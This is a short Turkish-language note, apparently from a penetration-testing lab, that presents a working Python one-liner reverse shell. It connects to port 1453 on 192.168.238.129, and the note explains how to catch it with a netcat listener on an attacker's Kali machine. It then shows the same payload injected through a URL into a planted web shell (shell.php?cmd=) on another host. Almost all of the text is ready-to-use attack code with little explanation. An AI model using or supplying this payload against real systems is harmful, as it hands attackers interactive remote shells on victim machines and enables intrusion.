python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.238.129",1453));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])
Python 3 kullanılarak tek satırda yazılmış bir ters shell (reverse shell) oluşturma kodudur. Çalıştırıldığı hedef sistemde, belirtilen IP adresi (192.168.238.129) ve port numarasına (1453) sahip bir dinleyiciye (genellikle saldırganın kontrolündeki bir makinede çalışan bir araç) bir bağlantı kurar ve hedef sistemin kabuğunu (shell) bu bağlantı üzerinden yönlendirir.
Saldırgan tarafında (örneğin, Kali Linux makinesinde) bu bağlantıyı kabul etmek için netcat (nc -lvnp 1453
) gibi bir dinleyicinin nasıl kurulmalıdır
Aşağıda url üzerinden enjecte edilmiş reverse shell bulunmakdır.
http://192.168.238.134/viking_app/shell.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.238.129",1453));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'